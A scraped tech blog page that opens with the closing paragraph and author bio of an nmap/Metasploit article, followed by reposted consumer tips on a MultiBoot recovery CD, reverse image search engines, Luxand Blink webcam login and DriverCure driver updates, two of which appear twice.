Figure 10: nmap results showing sqlite3 ConclusionThis information can be useful in checking the integrity and strength of your network if you are the Network Security Engineer for your workplace, and have permission to do so. Doing this to networks that you have no authorization to be on is against the law in many if not all countries. For more information and some video tutorial please visit my website at http://pbnetworks.net On the 'NetLink to postgres setup: http://dev.metasploit.com/redmine/projects/framework/wiki/Postgres_setupLink to video tutorials: http://pbnetworks.net/?cmd=bbs   

 



dave@pbnetworks.net


 David J. Dodd



David J. Dodd is currently in the United States and holds a current 'Secret' DoD Clearance. A former U.S. Marine with Avionics background in Electronic Countermeasures Systems. David has given talks at the San Diego Regional Security Conference He works for pbnetworks Inc. http://pbnetworks.net a small service disabled veteran owned business located in San Diego, CA



 

BSDContact DetailsDavid J. DoddDriverLinuxPerson Email AddresstechGyanTechnologyUbuntu Add new comment Author  dave@pbnetworks.net CHMag Collector's Edition Vol II


 

Thursday, March 8, 2012

Repair your computer's system software using MultiBoot CD

Have you ever encountered that your Computer does not boot normally? Therefore, you need to recover your data from the system before you format the Computer since the data located in the same Drive with the operating system has installed. So, easiest way to recover these data is booting the Computer with Live Bootable cd (emegency disk). I am going to discuss about Multiboot CD which contains many features for recovering data, resetting login passwords, partitioning drives, Memory testing and more.You can download Multiboot CD iso from torrent download. Check these links for download link1& link2.
In order to boot from this CD, initially you need to write this downloaded ISO file into a CD using a image CD writer like Nero. Then, put the bootable CD into CD ROM and restart your Computer. Change the boot priority by entering into BIOS menu. After that, you will be able to boot from this CD. You will see several options to choose like above figure. Select any feature to boot from that. When i selected Parted Magic Version 5.9, i was able to enter to the below live desktop.
There is a live Windows XP feature is also available in the menu. So, you can enter to this Windows XP desktop for doing various system administration tasks.
 

Do not forget to leave your comments below.

View the original article here

Monday, March 5, 2012

Search images using Reverse image search engines


View the original article here

Search images using Reverse image search engines

There are many search engines on the internet which can be used to search varies types of websites by entering a keyword to the search engine. However, Google is the most popular search engine in the World. These search engines perform several activities such as crawling, indexing, processing, calculating and relevancy and retrieving in order to deliver the desired search results. Unlike these search engines, there are several search engines which can be used to search images by uploading an image to the search engine instead of typing a keyword. These search engines are called Reverse Image search engines. Therefore, this technology can be used to find duplicate images on the internet. Suppose that your photos are copied by another person without having your permission and that person published photos to the internet, now you can search those photos using these reverse image search engines.



TinEye is the most powerful image search engine in the internet so that you find almost all the duplicate images for your image search. Go to the website from this link http://www.tineye.com

Upload any photo to the TinEye and click search for results. It will give almost all the duplicate images as results.
 
The following are the other popular reverse image search engines.
Google images : Google has recently launch a reverse image search engine Byo Image Search :This search engine is based on the color palette uniformity basically. However, it include theme based algorithm. They utilize a search technology called Piximilar visual. It analyses large number of image
 attributes such as color, shape, texture, luminosity, complexity etc.Gazpopa : In this search engine, The similarity is compared on the bases of the bases images color and shape match which works nicely however at some times it can get confusing results.RevIMG :  It finds images using an algorithms based on shape, dimensions, and colors.Please remember to put your comments below for this article.

Sunday, March 4, 2012

Login to your computer using Webcam instead of typing password

Most of people use password protection to their computers for preventing unauthorized access. Therefore, the correct password must be typed in order to access to the system when the user login in to the computer. So this is also somewhat tedious and old way. However, with new technology, modern laptops such as Dell XPS laptops use face detection techniques for getting access to the system with webcam. There, user can previously enter his face details using the webcam. When login to the computer, it compares image of the face with the registered face and if both images are similar, then the system allows to access. Today, I will discuss on how to login to your computer or a laptop using the webcam instead of typing the password. Hence, i will introduce an application called Luxand Blink Pro for this purpose.

Get Luxand Blink Pro from here



Install Luxand Blink Pro in your PC and then run it, small icon will appear in the taskbar
Now, it will open the main window so here you can enable the Face authentication method. Click on the camera button to select the camera then it will show all the cameras which connected to your PC. Choose the webcam as a camera and after click Apply button. Now, you can register your face with the application. Click on Remember button in the main menu.
When you register your face with the application, the webcam capture your face and the details will be saved.
To register your face, look at the monitor and slowly turn your head from left to right. Then it will process the information and it will be saved.
Enter the Login password after capturing the face details. In addition to this features, you can see login history with a login persons picture and Pro settings can also be used to enable face lock. After that, you can log off or restart the computer for testing this application. You will be prompted to access using two methods so that you can choose face detection for login to the system. In the same way that you as before, you can look at the monitor and turn your head from left to righ then the system will be recognize your face and allow for accessing. Following figure was taken while recognizing the face at the login window.
Download

Click the link to get Luxand Blink

Easily find and fix your computer's driver problems using DriverCure

When you install a new operating system to your Desktop computer or Laptop, most difficult thing is to find appropriate driver for hardwares. Normally, after installing new operating system, you need to find drivers for hardwares one by one from the internet and install them. Without searching these drivers one by one, you can use DriverCure which can scan your hardware and then it can automatically download appropriate driver for installing.
Normally run the DriverCure and click on Start Scan button to scan hardware of your computer. DriverCure will search hardware and it will display out dated drivers with red color. Get DriverCure from below links


Link

Now, you can solve the driver problem by selecting driver to be updated, click Fix Now button to start driver downloading process.

After download drivers, you can easily install them to the system. However, DriverCure is not a freeware so you have to pay for this software. 
 

Link
Do not forget to leave your comments below.

Thursday, February 23, 2012

Login to your computer using Webcam instead of typing password

Most of people use password protection to their computers for preventing unauthorized access. Therefore, the correct password must be typed in order to access to the system when the user login in to the computer. So this is also somewhat tedious and old way. However, with new technology, modern laptops such as Dell XPS laptops use face detection techniques for getting access to the system with webcam. There, user can previously enter his face details using the webcam. When login to the computer, it compares image of the face with the registered face and if both images are similar, then the system allows to access. Today, I will discuss on how to login to your computer or a laptop using the webcam instead of typing the password. Hence, i will introduce an application called Luxand Blink Pro for this purpose.

Get Luxand Blink Pro from here


Install Luxand Blink Pro in your PC and then run it, small icon will appear in the taskbar
Now, it will open the main window so here you can enable the Face authentication method. Click on the camera button to select the camera then it will show all the cameras which connected to your PC. Choose the webcam as a camera and after click Apply button. Now, you can register your face with the application. Click on Remember button in the main menu.
When you register your face with the application, the webcam capture your face and the details will be saved.
To register your face, look at the monitor and slowly turn your head from left to right. Then it will process the information and it will be saved.
Enter the Login password after capturing the face details. In addition to this features, you can see login history with a login persons picture and Pro settings can also be used to enable face lock. After that, you can log off or restart the computer for testing this application. You will be prompted to access using two methods so that you can choose face detection for login to the system. In the same way that you as before, you can look at the monitor and turn your head from left to righ then the system will be recognize your face and allow for accessing. Following figure was taken while recognizing the face at the login window.
Download

Click the link to get Luxand Blink


View the original article here

Wednesday, February 22, 2012

Easily find and fix your computer's driver problems using DriverCure

When you install a new operating system to your Desktop computer or Laptop, most difficult thing is to find appropriate driver for hardwares. Normally, after installing new operating system, you need to find drivers for hardwares one by one from the internet and install them. Without searching these drivers one by one, you can use DriverCure which can scan your hardware and then it can automatically download appropriate driver for installing.
Normally run the DriverCure and click on Start Scan button to scan hardware of your computer. DriverCure will search hardware and it will display out dated drivers with red color. Get DriverCure from below links


Link

Now, you can solve the driver problem by selecting driver to be updated, click Fix Now button to start driver downloading process.

After download drivers, you can easily install them to the system. However, DriverCure is not a freeware so you have to pay for this software.
 

Link
Do not forget to leave your comments below.

View the original article here